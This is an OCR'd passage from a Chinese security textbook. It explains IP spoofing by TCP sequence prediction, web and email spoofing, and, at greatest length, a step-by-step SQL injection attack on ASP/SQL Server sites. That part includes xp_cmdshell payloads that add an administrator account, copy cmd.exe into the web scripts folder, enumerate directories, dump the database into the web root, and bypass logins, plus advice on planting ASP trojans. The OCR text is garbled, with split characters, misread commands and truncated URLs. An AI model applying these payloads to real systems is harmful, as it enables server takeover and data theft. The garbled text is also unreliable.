间 的 一 半 ， 如 果 此 时 目标 主机 刚刚 建立 过 一 个 连接 , 那么 再 加 上 64000。 一 旦 估计 出 ISN 
的 大 小 ， 就 开始 着 手 进行 攻击 ， 当 然 虚假 TCP 数据 包 进 入 目标 主机 时 ， 如 果 刚 才 估 计 的 
序 例 号 是 准确 的 ， 进 入 的 数据 将 被 放置 在 目标 机 的 缓冲 区 中 。 但 是 在 实际 攻击 过 程 中 往 
往 没 这 么 幸运 ， 如 果 估计 序 例 号 的 小 于 正确 值 ， 那 么 将 被 放弃 。 而 如 果 估 计 的 序 例 号 大 
于 正确 值 ， 并 且 在 缓冲 区 的 大 小 之 内 ， 那 么 该 数据 被 认为 是 一 个 未 来 的 数据 ，TCP 模块 
将 等 待 其 他 缺少 的 数据 。 如 果 估计 序 例 号 大 于 期 待 的 数字 且 不 在 缓冲 区 之 内 ，TCP 将 会 
放弃 它 并 返回 一 个 期 望 获得 的 数据 序 例 号 。 

伪装 成 主机 hostb 的 瑟 ， 此 时 ， 该 主机 仍然 处 在 瘫痪 状态 ， 然 后 向 目标 主机 的 513 
端口 (rlogin) 发 送 连 接 请 求 .目标 主机 hosta 立刻 对 连接 请 求 作出 反应 ,发 更 新 SYN+ACK 
确认 包 给 主机 hostb， 因 为 此 时 主机 host 仍然 处 于 瘫痪 状态 ， 它 当然 无 法 收 到 这 个 包 ， 
紧 接 关 攻 击 者 向 目标 主机 发 送 ACK 数据 包 , 该 包 使 用 前 面 估 计 的 序 例 号 加 1。 如 果 攻 击 
者 估计 正确 的 话 ， 目 标 主机 将 会 接收 该 ACK。 连接 就 正式 建立 起 了 ， 可 以 开始 数据 传输 
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了 。 如 果 达 到 这 一 步 ， 一 次 完整 的 IP 欺骗 就 算 完成 了 。 

下 面 总 结 一 下 卫 攻击 的 整个 步骤 : O 首先 使 主机 hostb 的 网 络 暂时 瘫痪 ， 以 免 对 
攻击 造成 干扰 ; @ 然后 连接 到 目标 机 hosta 的 某 个 端口 来 猜测 ISN 基 值 和 增加 规律 ; 
© 接 下 来 把 源 址 址 伪装 成 主机 hostb， 发 送 带 有 SYN 标志 的 数据 段 请 求 连接 ; © 然后 
等 待 目标 机 hosta 发 送 SYN+ACK 包 给 已 经 瘫痪 的 主机 ， 因 为 现在 看 不 到 这 个 包 ; © 最 
后 再 次 伪装 成 主机 hostb 向 目标 主机 hosta 发 送 的 ACK， 此 时 发 送 的 数据 段 带 有 预测 的 
目标 机 的 SN+1; © 连接 建立 ， 发 送 命令 请 求 。 

3. IP 欺骗 的 防范 

虽然 PP 欺骗 攻击 有 着 相当 难度 , 但 这 种 攻击 非常 广泛 ， 入 侵 往往 由 这 里 开始 。 预防 
这 种 攻击 可 以 删除 UNIX 中 所 有 的 /etc/hosts.equiv、$HOME/.rhosts 文件 ， 修 改 
/etc/inetd.conf 文件 ， 使 得 RPC 机 制 无 法 应 用 。 另 外 ， 还 可 以 通过 设置 防火 墙 过 滤 来 自 外 
部 而 信 源 地 址 却 是 内 部 IP 的 报 文 。 
3.3.8.4 Web 欺骗 

1. Web 欺骗 的 原理 

Web 欺骗 的 原理 是 攻击 者 通过 伪造 某 个 WWW 站 点 的 影像 拷贝 ， 使 该 影像 Web 的 
入 口 进入 到 攻击 者 的 Web 服务 器 ， 并 经 过 攻击 者 机 器 的 过 滤 作 用 ， 从 而 达到 攻击 者 监控 
受 攻击 者 的 任何 活动 以 获取 有 用 信息 的 目的 ， 这 些 信息 当然 包括 用 户 的 账户 和 口令 。 攻 
击 者 也 能 以 受 攻击 者 的 名 义 将 错误 或 者 易于 误解 的 数据 发 送 到 真正 的 Web 服务 器 , 以 及 
以 任何 Web 服务 器 的 名 义 发 送 数 据 给 受 攻击 者 。 简 而 言 之 , 攻击 者 观察 和 控制 着 受 攻击 
者 在 Web 上 做 的 每 一 件 事 。 在 整个 过 程 中 , 攻击 者 只 需要 在 自己 的 服务 器 上 建立 一 个 待 
攻击 站 点 的 拷贝 ， 然 后 就 是 等 待 受害 者 自 投 罗 网 。 因 此 ， 欺 骗 能 够 成 功 的 关键 是 在 受 攻 
击 者 和 其 他 Web 服务 器 之 间 设 立 起 攻击 者 的 Web 服务 器 ， 这 种 攻击 种 类 在 安全 问题 中 
称 为 “来 自 中 间 的 攻击 ” 

在 Web 欺骗 中 把 攻击 者 用 来 制造 假象 、 进 行 欺骗 攻击 中 的 道具 称 为 掩盖 体 。 这 些 道 
有 具 可 以 是 : 虚假 的 页 面 ， 虚 假 的 连接 ， 虚 假 的 图 表 ， 虚 假 的 表单 等 。 攻 击 者 竭尽 全 力 的 
试图 制造 令 受害 体 完全 信服 的 信息 。 并 引导 受害 体 做 一 些 非 安 全 性 的 操作 。 前 面 提 到 的 
网 络 钓 鱼 和 漏洞 攻击 中 ， 都 可 以 利用 Web 欺骗 。 同 时 ，Web 欺骗 也 属于 社会 工程 中 的 


一 种 。 
2. Web 欺骗 的 手段 和 方法 
(1) 改写 URL 


在 URL 重 写 中 , 攻击 者 能 够 把 网 络 流量 转 到 攻击 者 控制 的 另 一 个 站 点 上 。 利 用 URL 
地 址 , 使 地 址 都 向 攻击 者 的 Web 服务 器 , 即 攻击 者 可 以 将 自己 的 Web 地 址 加 在 所 有 URL 
地 址 的 前 面 。 这 样 ， 当 用 户 与 站 点 进行 安全 链接 时 ， 就 会 毫 不 防备 地 进入 攻击 者 的 服务 
器 ， 于 是 用 户 的 所 有 信息 便 处 于 攻击 者 的 监视 之 中 。 但 由 于 浏览 器 一 般 均 设 有 地 址 栏 和 
状态 栏 ， 当 浏览 器 与 某 个 站 点 边 接 时 ， 可 以 在 地 址 栏 和 状态 样 中 获得 连接 中 的 Web 站 点 
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地 址 及 其 相关 的 传输 信息 ， 用 户 由 此 可 以 发 现 问题 ， 所 以 攻击 者 往往 在 URL 地 址 重 写 
的 同时 ， 用 JavaScript 程序 来 重 写 地 址 栏 和 状态 栏 ， 以 达到 其 掩盖 欺骗 的 目的 。 
首先 ， 攻击 者 改写 Web 页 中 的 所 有 URL 地 址 ， 这 样 它 们 指向 了 攻击 者 的 Web 服务 
器 而 不 是 真正 的 Web 服务 器 。 假 设 攻击 者 所 处 的 Web 服务 器 是 www.attackerorg， 攻 击 
者 通过 在 所 有 链接 前 增加 http:/wwwattackerorg 来 改写 URL 。 例 如 ， 
http://home.netscape.com 将 变 为 http://www.attacker.org/http://home.netscape.com. 当 用 户 点 
击 改写 过 的 http://home.netscape.com〔 可 能 它 仍然 显示 的 是 http://home.netscape.com)， 
将 进入 的 是 http:/www.attackerorg ， 然 后 由 http://www.attacker.org 向 http://home. 
netscape.com 发 出 请 求 并 获得 真正 的 文档 ， 然 后 改写 文档 中 的 所 有 和 链接， 最 后 经 过 
http://www.attacker.org 返回 给 用 户 的 浏览 器 。 
如 果 受 攻击 者 填写 了 一 个 错误 Web 上 的 表单 ， 那么 结果 看 来 似乎 会 很 正常 ， 因为 内 
要 遵循 标准 的 Web 协议 ,表单 欺骗 很 自然 地 不 会 被 察觉 : 表单 的 确定 信息 被 编码 到 URL 
中 ,内 容 会 以 HTML (HyperTextMarkupLanguage， 超 文本 标记 语言 ) 形式 来 返回 。 既 然 
前 面 的 URL 都 已 经 得 到 了 改写 ， 那 么 表单 欺骗 将 是 很 自然 的 事情 。 
当 受 攻击 者 提交 表单 后 ， 所 提交 的 数据 进入 了 攻击 者 的 服务 器 。 攻 击 者 的 服务 器 能 
够 观察 ， 甚 至 是 修改 所 提交 的 数据 。 同 样 地 ， 在 得 到 真正 的 服务 器 返回 信息 后 ， 攻 击 者 
在 将 其 向 受 攻 击 者 返回 以 前 也 可 以 为 所 欲 为 。 
(2) 特殊 的 网 页 假象 
攻击 者 还 可 以 制造 一 些 特殊 的 网 页 来 攻击 用 户 。 而 这 些 网 页 表面 上 看 起 来 ， 或 许 只 
是 一 个 音乐 站 点 或 者 只 是 简单 一 幅 图 片 。 但 是 利用 通过 JavaScript 编程 或 者 是 perl 等 网 
页 语言 ， 受 害 者 会 被 感染 病毒 和 下 载 木马 程序 。 
。 Web 病毒 。 这 种 Web 欺骗 攻击 主要 是 以 迫害 用 户 机 器 为 主 。 它 制作 的 Web 看 起 
来 没有 任何 的 危害 ， 但 是 却 将 病毒 感染 给 了 被 攻击 者 的 机 器 。 
。 Web 木马 。 一 些 windows 的 漏洞 给 攻击 者 提供 了 方便 。 
。 图 片 格式 文件 的 病毒 。 这 种 病毒 的 原理 不 同 于 mime 漏洞 , 它 是 将 EXE 文件 伪装 
成 一 个 BMP 图 片 文件 ， 欺 骗 正 自动 下 载 ， 再 利用 网 页 中 的 JavaScript 脚本 查找 
客户 端的 Internet 临时 文件 夹 , 找到 下 载 后 的 BMP 文件 , 把 它 拷贝 到 Temp 目录 。 
再 编写 一 个 脚本 把 找到 的 BMP 文件 用 Debug 还 原 成 EXE， 并 把 它 放 到 注册 表 启 
动 项 中 ， 在 下 一 次 开机 时 执行 。 
3. Web 欺骗 的 预防 办 法 
Web 欺骗 是 当今 Intemet 上 具有 相当 危险 性 而 不 易 被 察觉 的 欺骗 手法 。 幸 运 的 是 ， 
可 以 采取 的 一 些 保护 办 法 。 
(1) 短期 的 解决 方案 
。 禁止 浏览 器 中 的 JavaScript 功能 ， 那 么 各 类 改写 信息 将 原形 毕露 ; 
。 确保 浏览 器 的 连接 状态 是 可 见 的 ， 它 将 提供 当前 位 置 的 各 类 信息 ; 
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。 时 刻 注 意 所 点 击 的 URL 链接 会 在 位 置 状 态 行 中 得 到 正确 的 显示 。 

现在 ，JavaScript、ActiveX 以 及 Java 提供 越 来 越 丰富 和 强大 的 功能 ， 而 且 越 来 越 为 
黑客 们 进行 攻击 活动 提供 了 强大 的 手段 。 为 了 保证 安全 ， 建 议 用 户 考虑 禁止 这 些 功能 。 

(2) 长 期 的 解决 方案 

。 改变 浏览 器 ， 使 之 具有 反映 真实 URL 信息 的 功能 ， 而 不 会 被 蒙 项 ; 

。 对 于 通过 安全 连接 建立 的 Web 一 一 浏览 器 对 话 , 浏览 器 还 应 该 告诉 用 户 谁 在 男 一 

端 ， 而 不 只 是 表明 一 种 安全 连接 的 状态 。 比 如 : 在 建立 了 安全 连接 后 ， 给 出 一 个 
提示 信息 “NetscapeInc.” 等 等 。 

3.3.8.5 ”Email 欺骗 

电子 邮件 欺骗 是 在 电子 邮件 中 改变 名 字 使 之 看 起 来 是 从 某 地 或 某 人 发 来 的 实际 行 
为 。 这 种 欺骗 经 常 被 攻击 者 用 来 防止 被 人 们 识破 。 还 可 用 来 实现 恶作剧 和 恶意 行为 。 

欺骗 者 使 用 电子 邮件 欺骗 有 三 个 目的 : 第 一 ， 隐 藏 自己 的 身份 。 第 二 ， 欺 骗 者 想 冒 
充 其 他 人 。 使 用 这 种 方法 ， 无 论 谁 接受 到 这 封 邮 件 ， 会 认为 邮件 是 欺骗 者 冒充 的 人 发 出 
的 。 第 三 ， 电 子 邮 件 欺 骗 是 社会 工程 的 一 种 表现 形式 。 例 如 ， 如 果 欺 骗 者 想 让 用 户 发 给 
他 一 份 敏 感 文件 ， 欺 骗 者 伪装 邮件 地 址 ， 使 用 户 认为 这 是 老板 的 要 求 ， 用 户 可 能 会 发 给 
他 这 封 邮件 。 

执行 电子 邮件 欺骗 有 三 种 基本 方法 , 每 一 种 有 不 同 难 度 级 别 , 执行 不 同 层 次 的 隐蔽 ; 

1. 相似 的 电子 邮件 地 址 

使 用 这 种 类 型 的 攻击 ， 欺 骗 者 需要 首先 找到 公司 老板 或 者 高 级 管理 人 员 的 名 字 。 然 
后 ， 欺 骗 者 注册 一 个 看 上 去 像 高 级 管理 人 员 名 字 的 邮件 地 址 。 只 需 简 单 地 进入 hotmail 
等 网 站 或 者 提供 免费 邮件 的 公司 ， 申 请 这 样 一 个 账号 ， 并 在 电子 邮件 的 别名 字段 填 入 管 
理 者 的 名 字 。 别 名 字段 将 显示 在 用 户 的 邮件 客户 的 发 件 人 字段 中 。 因 为 邮件 地 址 似乎 是 
正确 的 ， 所 以 收 信人 很 可 能 会 回复 它 ， 这 样 欺骗 者 就 会 得 到 想 要 的 信息 。 
当 用 户 收 到 邮件 时 ， 注 意 到 它 没有 完整 的 电子 邮件 地 址 。 这 是 因为 把 邮件 客户 设 成 


只 显示 名 字 或 者 别名 字段 。 虽 然 通过 观察 邮件 头 ， 用 户 能 看 到 真实 的 邮件 地 址 是 什么 ， 
但 是 很 少 有 用 户 这 么 做 。 
2. 修改 邮件 客户 


当 用 户 发 出 一 封 电子 邮件 时 ， 如 果 没 有 对 发 件 人 地 址 进行 验证 或 者 确认 ， 当 欺骗 者 
有 一 个 像 outlook 的 邮件 客户 ， 就 能 够 进入 并 且 指 定 自己 出 现在 发 件 人 的 地 址 中 。 欺 骗 
者 能 够 指定 想 要 的 任何 返回 地 址 。 因此 当 用 户 回信 时 , 信件 将 发 送 到 欺骗 者 指定 的 地 址 ， 
而 不 是 到 真实 的 地 址 。 

3. 远程 联系 ， 登 录 到 端口 25 

邮件 欺骗 一 个 更 复杂 的 方法 是 远程 登录 到 邮件 服务 器 的 端口 25。 邮件 服 务 器 可 以 在 
互联 网 上 收发 邮件 。 当 欺骗 者 想 发 送 给 用 户 信息 时 ， 先 写 一 个 信息 ， 然 后 单 击发 送 。 接 
下 来 他 的 邮件 服务 器 与 用 户 的 邮件 服务 器 联系 , 在 端口 25 发 送信 息 。 用 户 的 邮件 服务 器 
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将 把 这 个 信息 传递 给 用 户 。 

越 来 越 多 的 系统 管理 员 正 在 意识 到 欺骗 者 在 使 用 他 们 的 系统 进行 欺骗 ， 所 以 更 新 版 
的 邮件 服务 器 不 允许 邮件 转发 ， 并 且 一 个 邮件 服务 器 应 该 只 发 送 或 者 接受 一 个 指定 域名 
或 者 公司 的 邮件 。 
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3.3.9.1 SQL (StructuredQueryLanguage) 注入 攻击 

随 着 B/S 模式 应 用 开发 的 发 展 ， 使 用 这 种 模式 编写 应 用 程序 的 程序 员 也 越 来 越 多 。 
但 是 由 于 程序 员 的 水 平 及 经 验 也 参差 不 齐 ， 相 当 大 一 部 分 程序 员 在 编写 代码 的 时 候 ， 没 
有 对 用 户 输 入 数据 的 合法 性 进行 判断 ， 使 应 用 程序 存在 安全 隐患 。 用 户 可 以 提交 一 段 数 
据 库 查 询 代 码 ， 根 据 程 序 返 回 的 结果 ， 获 得 某 些 他 想 得 知 的 数据 ， 这 就 是 所 谓 的 
SQLInjection， 即 SQL 注入 。SQL 注入 是 从 正常 的 WWW 端口 访问 ， 而 且 表 面 看 起 来 跟 
一 般 的 Web 页 面 访问 没什么 区 别 ， 所 以 目前 市 面 的 防火 墙 都 不 会 对 SQL 注入 发 出 警报 ， 
如 果 管 理 员 没 查看 IS 日 志 的 习惯 ， 可 能 被 入 侵 很 长 时 间 都 不 会 发 觉 。 但 是 ，SQL 注入 
的 手法 相当 灵活 ， 在 注入 的 时 候 会 碰 到 很 多 意外 的 情况 。 需 要 根据 具体 情况 进行 分 析 ， 构 造 
巧妙 的 SQL 语句 ， 从 而 成 功 获取 想 要 的 数据 。 据 统计 ， 网 站 用 ASP+Access 或 SQLServer 
的 占 70% 以 上 ，PHP+MySQL 占 20%， 其 他 的 不 足 10%。 本 小 节 以 SQL SERVER+ASP 例 
说 明 SQL 注入 的 原理 、 方 法 与 过 程 。SQL 注入 攻击 的 过 程 主要 包含 以 下 几 步 

。 发 现 SQL 注入 位 置 ; 

。 判断 后 台数 据 库 类 型 
确定 XP_CMDSHELL 可 执行 情况 ; 

发 现 WEB 虚拟 目录 ; 
。 上 传 ASP 木马 ; 
得 到 管理 员 权 限 。 

1. 发 现 SQL 注入 位 置 

SQL 注入 漏洞 的 判断 一 般 来 说 ，SQL 注入 一 般 存 在 于 形 如 : HTTP://xxx.xxx. 
xxx/abc.asp?id=XX 等 带 有 参数 的 ASP 动态 网 页 中 ， 有 时 一 个 动态 网 页 中 可 能 只 有 一 个 
参数 ， 有 时 可 能 有 N 个 参数 ， 有 时 是 整 型 参数 ， 有 时 是 字符 串 型 参数 ， 不 能 一 概 而 论 。 
总 之 只 要 是 带 有 参数 的 动态 网 页 且 此 网 页 访问 了 数据 库 ， 那 么 就 有 可 能 存在 SQL 注入 。 
如 果 ASP 程序 员 没 有 安全 意识 ， 不 进行 必要 的 字符 过 滤 ， 存 在 SQL 注入 的 可 能 性 就 非 
常 大 。 

为 了 全 面 了 解 动态 网 页 回答 的 信息 , 首先 请 调整 TE 的 配置 .把 TE 菜单 -工具 -Intemet 
选项 一 高 级 一 显示 友好 HTTP 错误 信息 前 面 的 勾 去 掉 。 为 了 把 问题 说 明 清楚 ， 以 下 以 
HTTP://xxx.xxx.xxx/abc.asp?p=YY 为 例 进行 分 析 ，YY 可 能 是 整 型 ， 也 有 可 能 是 字符 串 。 

整 型 参数 的 判断 当 输入 的 参数 YY 为 整 型 时 ， 通 常 abc.asp 中 SQL 语句 原貌 大 至 如 
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F: select*from 表 名 where 字段 =YY， 所 以 可 以 用 以 下 步骤 测试 SQL 注入 是 否 存在 。 

© HTTP://xxx.xxx.xxx/abc.asp?p=YY (附加 一 个 单 引号 )， 此 时 abc.ASP 中 的 SQL 
语句 变 成 了 select*from 表 名 where 字段 =YY*，abc.asp 运行 异常 ; 

@ HTTP://xxx.xxx.xxx/abe.asp?p=YYandl=l ， abcasp 运行 正常， 而 且 与 
HTTP:/xxx.xxx.xxx/abc.asp?p=YY 运行 结果 相同 ; 

@ HTTP://xxx.xxx.xxx/abe.asp?p=Y Yand1=2, abc.asp 运行 异常 如果 以 上 三 步 全 面 
满足 ，abc.asp 中 一 定 存 在 SQL 注入 漏洞 。 

字符 串 型 参数 的 判断 当 输 入 的 参数 YY 为 字符 串 时 ， 通 常 abc.asp 中 SQL 语句 原貌 
大 致 如 下 : select*from 表 名 where 字段 =YY'， 所 以 可 以 用 以 下 步骤 测试 SQL 注入 是 否 
存在 。 

@ HTTP://xxx.xxx.xxx/abe.asp?p=YY (附加 一 个 单 引 号 )， 此 时 abc. ASP 中 的 SQL 
语句 变 成 了 select*from 表 名 where 字段 =YY"，abc.asp 运行 异常 ; 

@ HTTP://xxx.xxx.xxx/abc.asp?p=YY &nb...39;1'='1', abc.asp 运行 正常 ， 而 且 与 
HTTP://xxx.xxx.xxx/abe.asp?p=YY 运行 结果 相同 ; 

@ HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb...39;1'='2', abc.asp 运行 异常 ， 如 果 以 上 三 
步 全 面 满足 ，abc.asp 中 一 定 存在 SQL 注入 漏洞 。 

有 时 ASP 程序 员 会 在 程序 员 过 滤 掉 单 引 号 等 字符 ， 以 防止 SQL 注入 。 此 时 可 以 用 
以 下 儿 种 方法 试 一 试 。 

@ 大 小 定 混合 法 : 由 于 VBS 并 不 区 分 大 小 写 ， 而 程序 员 在 过 滤 时 通常 要 么 全 部 过 
滤 大 写字 符 串 ， 要 么 全 部 过 滤 小 写字 符 串 ， 而 大 小 写 混合 往往 会 被 忽视 。 如 用 SelecT 代 
替 select, SELECT 等 ; 

@ UNICODE 法 : 在 IIS 中 , 以 UNICODE 字符 集 实现 国际 化 ， 完 全 可 以 IE 中 输入 
的 字符 串 化 成 UNICODE 字符 串 进 行 输入 。 如 +=%2B， 空 格 =%20 等 ; 

© ASCI 码 法 : 可 以 把 输入 的 部 分 或 全 部 字符 全 部 用 ASC 码 代替 , 如 U=chr(85), 
a=chr (97) 等 。 

2. 区 分 数据 库 服 务 器 类 型 

一 般 来 说 ，ACCESS 与 SQL-SERVER 是 最 常用 的 数据 库 服务 器 ， 尽 管 它们 都 支持 
T-SQL 标准 , 但 还 有 不 同 之 处 , 而 且 不 同 的 数据 库 有 不 同 的 攻击 方法 ,必须 要 区 别 对 待 。 

利用 数据 库 服务 器 的 系统 变量 进行 区 分 SQL-SERVER 有 user，db_name() 等 系统 
变量 , 利用 这 些 系统 值 不 仅 可 以 判断 SQL-SERVER, 而 且 还 可 以 得 到 大 量 有 用 信息 。 如 : 

@ HTTP://xxx.xxx.xxx/abe.asp?p=Y Yanduser>0 不 仅 可 以 判断 是 否 是 SQL-SERVER， 
而 还 可 以 得 到 当前 连接 到 数据 库 的 用 户 名 ; 

@ > HTTP://xxx.xxx.xxx/abc.asp?p=YY&n...db name () >0 不 仅 可 以 判断 是 否 是 
SQL-SERVER， 而 还 可 以 得 到 当前 正在 使 用 的 数据 库 名 ; 

利用 系统 表 ACCESS 的 系统 表 是 msysobjects， 且 在 Web 环境 下 没有 访问 权限 ， 而 
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SQL-SERVER 的 系统 表 是 sysobjects， 在 WEB 环境 下 有 访问 权限 。 对 于 以 下 两 条 语句 : 

@® HTTP://xxx.xxx.xxx/abc.asp?p=YYand (selectcount (*) fromsysobjects) >0 

@ HTTP://xxx.xxx.xxx/abc.asp?p=Y Yand (selectcount (*) frommsysobjects) >0 #7 
数据 库 是 SQL-SERVE, 则 第 一 条 ，abc.asp 一 定 运 行 正常 , 第 二 条 则 异常 ; 若是 ACCESS 
则 两 条 都 会 异常 。 

3. 确定 XP_CMDSHELL 可 执行 情况 

若 当 前 连接 数据 的 账号 具有 SA 权限 ， 且 master.dbo.xp_cmdshell 扩展 存储 过 程 〈 调 
用 此 存储 过 程 可 以 直接 使 用 操作 系统 的 shell) 能 够 正确 执行 ， 则 整个 计算 机 可 以 通过 以 
下 儿 种 方法 完全 控制 : 

@ HTTP://xxx.xxx.xxx/abc.asp?p=Y Y &nb...er>0abc.asp 执行 异常 但 可 以 得 到 当前 连 
接 数 据 库 的 用 户 名 《〈 若 显示 dbo 则 代表 SA). 

@ HTTP://xxx.xxx.xxx/abe.asp?p=YY...me () >0abc.asp 执行 异常 但 可 以 得 到 当前 连 
接 的 数据 库 名 。 

@ HTTP://xxx.xxx.xxx/abe.asp?p=YY; execmaster..xp_cmdshell “netuseraaabbb/add 
-- (master 是 SQL-SERVER 的 主 数据 库 ， 其 中 的 分 号 表示 SQL-SERVER 执行 完 分 号 前 
的 语句 ， 继 续 执行 其 后 面 的 语句 ;“--” 号 是 注解 ， 表 示 其 后 面 的 所 有 内 容 仅 为 注释 ， 系 
统 并 不 执行 ) 可 以 直接 增加 操作 系统 账户 aaa， 密 码 为 bbb。 

@ HTTP://xxx.xxx.xxx/abc.asp?p=YY; execmaster..xp_cmdshell “netlocalgroupadmini 
stratorsaaa/add”-- 把 刚刚 增加 的 账户 aaa 加 到 administrators 组 中 。 

®© HTTP://xxx.xxx.xxx/abe.asp?p=YY ; backuupdatabase 数据 库 名 todisk= 
'ci\inetpubWwwwroot\save.db' 则 把 得 到 的 数据 内 容 全 部 备份 到 Web 目录 下 ， 再 用 HTTP 把 
此 文件 下 载 〈 当 然 首先 要 知道 Web 虚拟 目录 )。 

© 通过 复制 CMD 创建 UNICODE 漏洞 HTTP://xxx.xxx.xxx/ abc.asp?p=YY;exe... 
dbo.xp_cmdshell “copyc:\winnt\system32\cmd.exec:\inetpub\scripts\cmd.exe” 便 制造 了 一 个 
UNICODE 漏洞 ， 通 过 此 漏洞 的 利用 方法 ， 便 完成 了 对 整个 计算 机 的 控制 。 

4. 发 现 Web 虚拟 目录 

只 有 找到 Web 虚拟 目录 ， 才 能 确定 放置 ASP 木马 的 位 置 ， 进 而 得 到 USER 权限 。 
有 两 种 方法 比较 有 效 。 一 是 根据 经 验 猜 解 ， 一 般 来 说 ，Web 虚拟 目录 是 : 
c:\inetpub\wwwroot:D:\inetpub\wwwroot:E:\inetpub\wwwroot 等 ， 而 可 执行 虚拟 目录 是 : 
c:\inetpub\scripts;D:\inetpub\scripts:E:\inetpub\scripts 等 。 二 是 遍历 系统 的 目录 结构 ， 分 析 
结果 并 发 现 Web 虚拟 目录 ; 先 创建 一 个 临时 表 : tempHTTP://xxx.xxx.xxx/abc.asp?p 
=YY;create&n...mp (idnvarchar (255), numlnvarchar (255), num2nvarchar (255), 
num3nvarchar (255)) : 接 下 来 : 

© 可 以 利用 xp_availablemedia 来 获得 当前 所 有 了 驱动器， 并 存 入 temp 表 中 : 
HTTP://xxx.xxx.xxx/abc.asp?p=Y YY;inserttemp...ter.dbo.xp_availablemedia;-- 通 过 查询 temp 
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的 内 容 可 以 获得 驱动 器 列表 及 相关 信息 ; 

@ 可 以 利用 xp_subdirs 获得 子 目 录 列 表 , 并存 入 temp 表 中 :HTTP://xxx. xxx.xxx/abc. 
asp?p=YY:insertintotemp (i...dbo.xp_subdirs'c:\'; 

© 可 以 利用 xp_dirtree 获得 所 有 子 目 录 的 目录 树 结 构 ， 并 存 入 temp 表 中 : 
HATTP://xxx.xxx.xxx/abc.asp?p=Y Y;insertintotemp (id, num] ) execmaster.dbo.xp_dirtree'c:\'; 

这 样 就 可 以 成 功 的 浏览 到 所 有 的 目录 文件 夹 ) 列表 : 如 果 需 要 查看 某 个 文件 的 内 
容 ， 可 以 通过 执行 xp_cmdsell: HTTP://xxx.xxx.xxx/abc.asp?p=YY-insertintotemp (id) 
exec...nbsp;'typec:\web\index.asp'; 使 用 'bulkinsert' 语 法 可 以 将 一 个 文本 文件 插入 到 一 个 临 
时 表 中 。 如 : bulkinserttemp (id)from'ci\inetpubWwwwroot\index.asp' 浏 览 temp 就 可 以 看 
到 index.asp 文件 的 内 容 了 。 

通过 分 析 各 种 ASP 文件 ， 可 以 得 到 大 量 系统 信息 ，Web 建设 与 管理 信息 ， 甚 至 可 以 
得 到 SA 账号 的 连接 密码 。 当 然 ， 如 果 xp_cmshell 能 够 执行 ， 可 以 用 它 来 完成 : 
HTTP://xxx.xxx.xxx/abc.asp?p=Y Y;insertintotemp (id) &nbs...cmdshell'dirc:\;HTTP://xxx. 
Xxxx.xxx/abe.asp?p=YY-insertintotemp (id) &n...p_cmdshell'dire:\*.asp/s/a'; 通 过 xp_cmdshell 
可 以 看 到 所 有 想 看 到 的 , 包括 W3svcHTTP://xxx.xxx.xxx/abe.asp?p=Y Y; insertintotemp (id) 
execmaster.dbo.xp_cmdshe...ub\AdminScripts\adsutil.vbsenumw3svc' 但 是 ， 如 果 不 是 SA 权 
限 ， 还 可 以 使 用 HTTP://xxx.xxx.xxx/abc.asp?p=YY:insertintotemp ( id, numl ) 
execmaster.dbo.xp_dirtree'c:\'。 

5. 上传 ASP (ActiveServerPage) 木马 

所 谓 ASP 木马 ， 就 是 一 段 有 特殊 功能 的 ASP 代码 ， 并 放 入 Web 虚拟 目录 的 Scripts 
下 ， 远 程 客户 通过 E 就 可 执行 它 ， 进 而 得 到 系统 的 USER 权限 ， 实 现 对 系统 的 初步 控 
制 。 一 般 有 两 种 方式 上 传 ASP 木马 。 第 一 种 ， 通 过 sql 注入 手段 ， 获 取 管 理 员 权 限 ， 通 
过 备份 数据 库 的 功能 将 asp 木马 写 入 服务 器 。 第 二 种 ， 进 入 后 台 通过 asp 程序 的 上 传 功 
能 的 漏洞 ， 上 传 木马 等 等 ， 当 然 正 常情 况 下 ， 这 些 可 以 上 传 文件 的 asp 程序 都 是 有 权限 
限制 的 ， 大 多 也 限制 了 asp 文件 的 上 传 。 

许多 Web 站 点 ， 为 了 维护 的 方便 ， 都 提供 了 远程 管理 的 功能 ， 也 有 不 少 Web 站 点 ， 
其 内 容 是 对 于 不 同 的 用 户 有 不 同 的 访问 权限 。 为 了 达到 对 用 户 权 限 的 控制 ， 都 有 一 个 网 
页 ， 要 求 用 户 名 与 密码 ， 只 有 输入 了 正确 的 值 ， 才 能 进行 下 一 步 的 操作 ， 可 以 实现 对 
Web 的 管理 ， 如 上 传 、 下 载 文件 ， 目 录 浏 览 、 修 改 配置 等 。 因 此 ， 若 获取 正确 的 用 户 名 
与 密码 , 不 仅 可 以 上 传 ASP 木马 ， 有 时 甚至 能 够 直接 得 到 USER 权限 而 浏览 系统 ， 上 一 
步 的 “发 现 Web 虚拟 目录 ”的 复杂 操作 都 可 省 略 。 用 户 名 及 密码 一 般 存 放 在 一 张 表 中 ， 
发 现 这 张 表 并 读 取 其 中 内 容 便 解决 了 问题 。 以 下 给 出 两 种 有 效 方 法 。 

O 注入 法 : 从 理论 上 说 ， 认 证 网 页 中 会 有 型 如 : select*fromadminwhereusemame= 
XXX'andpassword=- YYY' 的 语句 ， 若 在 正式 运行 此 名 之前， 没有 进行 必要 的 字符 过 滤 ， 
则 很 容易 实施 SQL 注入 。 如 在 用 户 名 文本 框 内 输入 : 'abc'orl=1 在 密码 框 内 输入 : 123 
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则 SQL 语句 变 成 : select*ffomadminwhereusername='abc'orl=landpassword='123' 不 管用 户 
输入 任何 用 户 名 与 密码 ， 此 语句 永远 都 能 正确 执行 ,用 户 轻易 驴 过 系统 ,获取 合法 身份 。 

© 猜 解 法 : 基本 思路 是 : 猜 解 所 有 数据 库 名 称 ， 猜 出 库 中 的 每 张 表 名 ， 分 析 可 能 
是 存放 用 户 名 与 密码 的 表 名 ， 猜 出 表 中 的 每 个 字段 名 ， 猜 出 表 中 的 每 条 记录 内 容 。 猜 解 
所 有 数据 库 名 称 HTTP://xxx.xxx.xxx/abc.asp?p=YYand ( selectcount ( * ) 
frommaster.dbo.sysdatabaseswherename>landdbid=6) <>0 因为 dbid 的 值 从 1 到 5， 是 系 
统 使 用 。 所 以 用 户 建 的 一 定 是 从 6 开始 的 。 并 且 提 交 了 name>l (name 字段 是 一 个 字符 
型 的 字段 和 数字 比较 会 出 错 )，abc.asp 工作 异常 ， 可 得 到 第 一 个 数据 库 名 ， 同 理 把 DBID 
分 别 改 成 7，8，9，10，11，12，… 就 可 得 到 所 有 数据 库 名 。 以 下 假设 得 到 的 数据 库 名 
是 TestDB。 猜 解数 据 库 中 用 户 名 表 的 名 称 猜 解法 : 此 方法 就 是 根据 个 人 的 经 验 猜 表 名 ， 


一 般 来 说 有 ，user，users，member，members，userlist，memberlist，userinfo，manager， 


